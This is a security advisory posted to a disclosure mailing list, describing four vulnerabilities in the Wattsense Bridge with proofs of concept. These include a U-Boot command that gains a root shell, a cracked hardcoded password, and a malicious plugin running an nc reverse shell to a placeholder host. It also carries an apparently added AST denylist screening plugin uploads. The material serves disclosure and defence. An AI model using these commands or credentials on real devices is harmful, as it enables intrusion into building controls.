Message-ID: <3d1684cf-a299-46b7-85ad-b06b44950ea5@sec-consult.com>
Date: Tue, 11 Feb 2025 09:01:08 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20250211-0 :: Multiple vulnerabilities in
 Wattsense Bridge

SEC Consult Vulnerability Lab Security Advisory < 20250211-0 >
=======================================================================
               title: Multiple vulnerabilities
             product: Wattsense - Wattsense Bridge
  vulnerable version: Wattsense Bridge
                       * Hardware Revision: WSG-EU-SC-14-00, 20230801
                       * Firmware Revision: Wattsense (Wattsense minimal)
                                            5.7.2 ws-box-v1.3
       fixed version: Issue 2&3 >=6.4.1, Issue 4 >=6.1.0
          CVE number: CVE-2025-26408, CVE-2025-26409, CVE-2025-26410
                      CVE-2025-26411
              impact: high
            homepage: https://www.wattsense.com
               found: 2023-11-20
                  by: Constantin Schieber-Knöbl (Office Vienna)
                      Stefan Schweighofer (Office Vienna)
                      Steffen Robertz (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Buildings in the EU are responsible for 40% of our energy consumption and
36% of greenhouse gas emissions.
At Wattsense, we believe that to reduce those hard-hitting numbers and
positively change our environment, we must bring technology, mostly reserved
for new or large facilities, to smaller and medium-sized buildings.
Wattsense gives property owners the power to make their buildings more
sustainable."

Source: https://www.wattsense.com/about


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends performing a thorough security review of the product,
conducted by security professionals, to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
If any of vulnerabilities 1-4 is successfully exploited, the following impact
arises:
An attacker with physical access to the device can control the measurements
and switching behavior of the device, e.g., by installing a backdoor for
later remote access. Since the Wattsense Bridge can trigger actions on
physical devices, safety violations and physical damage are possible.

1) Access to JTAG Interface (CVE-2025-26408)
The JTAG interface can be accessed with physical access to the PCB.
After connecting to the interface, full access to the device is
possible. This enables an attacker to extract information, modify
and debug the device's firmware.

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)
A serial interface can be accessed with physical access to the PCB. After
connecting to the interface, access to the bootloader is possible,
as well as a Linux login prompt. The bootloader access can be used to gain
a root shell on the device.

3) Weak Hardcoded Credentials (CVE-2025-26410)
The firmware of all devices contains the same hardcoded user and
root credentials. The user password can be easily recovered via password
cracking. The recovered credentials can be used to log into
the device via the login shell that is exposed by the serial interface,
described in the previous vulnerability "2) Access to Bootloader and
Shell Over Serial Interface".

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)
An authenticated attacker is able to use the Plugin Manager of the web
interface to upload malicious Python files to the device. This enables an
attacker to gain remote root access to the device. To conduct this attack,
an attacker needs a valid user account on the Wattsense web interface in
which Wattsense Bridge devices are configured.


Proof of concept:
-----------------
1) Access to JTAG Interface (CVE-2025-26408)
The unlocked JTAG interface is exposed on the stamp hole expansion interface
of the system on module (SoM) processing PCB (Myirtech MYC-Y6ULX) and is
documented in the related datasheet. By soldering the appropriate pins
(TMS, TCK, TDI, TDO, TRST) to the PCB, the JTAG port becomes accessible to an
adaptor. The MOD pin can be left unconnected; when it is not pulled high,
software debug features are enabled.
A Segger J-Link PRO JTAG adaptor is used to connect. The debugging software
OpenOCD can then be used to read and manipulate the firmware. This grants an
attacker with physical access to the device full control of the device.

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)
The serial interface on the Wattsense Bridge can be accessed by connecting to
the following pin header (GND, TX, RX) that is present on the PCB:

--------|
  +-+    |
  |o|GND |
  |o|RX  |
  |o|TX  |
  +-+    |
        Micro USB Port
         |

A serial-USB adaptor (e.g., FT232 based board) can be used to access the
serial interface. The following settings on an arbitrary terminal-program
are necessary:
  * Voltage: 3.3V
  * Speed: 115200 Baud
  * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)

After a successful connection, the bootloader is available by pressing any
key at startup. With the resulting U-Boot command shell, the environment
variables of the boot process can be modified. This allows an attacker
to launch a root shell during the boot process:

=> setenv mmcargs "setenv bootargs console=${console},${baudrate} root=${mmcpath} ${mmcroot} ${raucslot} init=/bin/sh"
=> boot

An attacker is now able to remount the file system to be readable and writeable
in the root shell:

# mount -o remount,rw /

At this point an attacker can, for example, backdoor the device with a new root
user by appending a line to the /etc/passwd file. The boot environment then
needs to be reset to its previous state. After the device is restarted, a Linux
login prompt is presented, where the newly created backdoor account can
be used to log into the system.

3) Weak Hardcoded Credentials (CVE-2025-26410)
The firmware on all devices includes the same hardcoded user and root password
hash. The user password hash can easily be cracked with the password cracking
tool john:

$ john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cracked 1 password hash
No password hashes left to crack (see FAQ)

$ john --show shadow
wattsense:wattsense::0:99999:7:::
1 password hash cracked, 0 left

The user's password can then be used for example to also log into the system
as a normal user via the vulnerability described in "2) Access to Bootloader
and Shell Over Serial Interface".

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)
The "Plugin Manager" feature of the Wattsense web interface allows an
authenticated attacker to upload malicious Python files to the Wattsense
Bridge. With the following Python code it is possible to gain a remote root
shell on a targeted device:

from wattsense.azote import Plugin
import os

class WriteSetpoint (Plugin):
   def __init__(self):
     os.system("nc -e /bin/sh <remote_host> <remote_port>")
     super().__init__()

   def callback(self,variable,value,timestamp):
     if variable == 'ERS_EYE_PRESENCE' and value == 1:
       self.publish('MCLIMAT_SETPOINT', "0E18:1")
     else:
       self.publish('MCLIMAT_SETPOINT', "0E12:1")
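A defender-side check that illustrates the problem with issue 4: the plugin manager executes whatever Python it receives. The following added example (written for this advisory, not Wattsense's own code) parses an uploaded plugin with the standard `ast` module and flags imports of OS-level modules and calls such as `os.system` before the file is accepted. The module and builtin denylists and the two sample plugins are constructed for illustration.

```python
import ast

# Constructed policy for illustration: modules and builtins that a data-plugin
# handling publish()/callback() logic has no legitimate reason to use.
DENIED_MODULES = {"os", "subprocess", "socket", "ctypes", "importlib", "pty"}
DENIED_BUILTINS = {"eval", "exec", "compile", "open", "__import__"}


def audit_plugin_source(source: str) -> list[str]:
    """Return findings for an uploaded plugin source; an empty list means clean."""
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg} (line {exc.lineno})"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):                      # import os
            for alias in node.names:
                if alias.name.split(".")[0] in DENIED_MODULES:
                    findings.append(f"line {node.lineno}: import of denied module '{alias.name}'")
        elif isinstance(node, ast.ImportFrom):                # from os import system
            if (node.module or "").split(".")[0] in DENIED_MODULES:
                findings.append(f"line {node.lineno}: import from denied module '{node.module}'")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in DENIED_BUILTINS:
                findings.append(f"line {node.lineno}: call to denied builtin '{func.id}'")
            elif isinstance(func, ast.Attribute):             # os.system(...)
                base = func.value
                if isinstance(base, ast.Name) and base.id in DENIED_MODULES:
                    findings.append(f"line {node.lineno}: call to '{base.id}.{func.attr}'")
    return findings


# Constructed sample: a plugin that only does what the Plugin API is for.
BENIGN_PLUGIN = """
from wattsense.azote import Plugin

class WriteSetpoint(Plugin):
    def callback(self, variable, value, timestamp):
        if variable == 'ERS_EYE_PRESENCE' and value == 1:
            self.publish('MCLIMAT_SETPOINT', "0E18:1")
        else:
            self.publish('MCLIMAT_SETPOINT', "0E12:1")
"""

# Constructed sample: the shape of the advisory's PoC, command replaced by a placeholder.
SUSPICIOUS_PLUGIN = """
from wattsense.azote import Plugin
import os

class WriteSetpoint(Plugin):
    def __init__(self):
        os.system("<command>")
        super().__init__()
"""
```

A static denylist like this is a screening aid only and can be evaded by indirect imports or dynamically built names; the durable fix is not to run uploaded plugin code with root privileges at all, but in an unprivileged, sandboxed process with a restricted API surface.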


Vulnerable / tested versions:
-----------------------------
The following version, which was the latest version available at the time of
the test, has been tested:

* Wattsense Bridge
   - Hardware Revision: WSG-EU-SC-14-00, 20230801
   - Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3


Vendor contact timeline:
------------------------
2024-05-15: Contacting vendor through support@...tsense.com
2024-05-15: The Wattsense team responded within one hour and the advisory was
             provided to them thereafter.
2024-05-21: The Wattsense team gave an update that vulnerabilities 3 and 4
             are already fixed and they are working on resolving the other
             ones (1-2) as well. Issue 5 will be worked on afterwards, when
             access to the device is further blocked.
2024-05-22: Asking how to proceed with issue 5, if Wattsense is going to fix it or
             the modem supplier.
2024-05-27: Vendor: no communication with the supplier yet, current focus is
             blocking access to the system. We offer to contact the supplier,
             Wattsense will do it in parallel as well. Removing issue 5 from this
             advisory, creating a separate one.
2024-06-18: Contacting Wattsense regarding a direct contact for the supplier as they
             are unresponsive.
2024-06-25: Vendor: only a distributor contact is available to them, they will look
             into it. Furthermore, issue 2 is fixed now.
2024-07-12: Vendor: The devices will receive updates starting from 2024-07-15.
             As some devices are not always connected, the vendor estimates that most
             devices should be updated by the end of September 2024.
2024-11-13: Asking for more information about affected firmware versions and how to
             proceed regarding the advisory release. No response.
2024-12-10: Asking for a status update.
2024-12-10: Vendor: Issue 1 is in the backlog. Issue 2 and issue 3 are fixed in
             version >= 6.4.1.
2024-12-16: Asking regarding the CVE reservation for the described issues and planned
             advisory, scheduling release for mid January; No response.
2025-02-04: Informing vendor that we will assign CVE and release the advisory shortly.
2025-02-11: Coordinated release of advisory.


Solution:
---------
The vendor communicated during initial contact that the following vulnerabilities
were already fixed or being worked on:
* Vulnerability 1: Vendor: Requires more attacker knowledge and higher physical access.
                    The device is meant to be installed at a restricted access physical
                    location. The issue will be put in the backlog of the Wattsense team.
* Vulnerability 2: fixed in recent FW versions BSP >= 6.4.1
* Vulnerability 3: User does not exist anymore in BSP >= 6.4.1
* Vulnerability 4: fixed in recent FW versions BSP >= 6.1.0


Workaround:
-----------
None


Advisory URL:
-------------
https://r.sec-consult.com/wattsense



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult

EOF C. Schieber-Knöbl, S. Schweighofer, S. Robertz / @2025

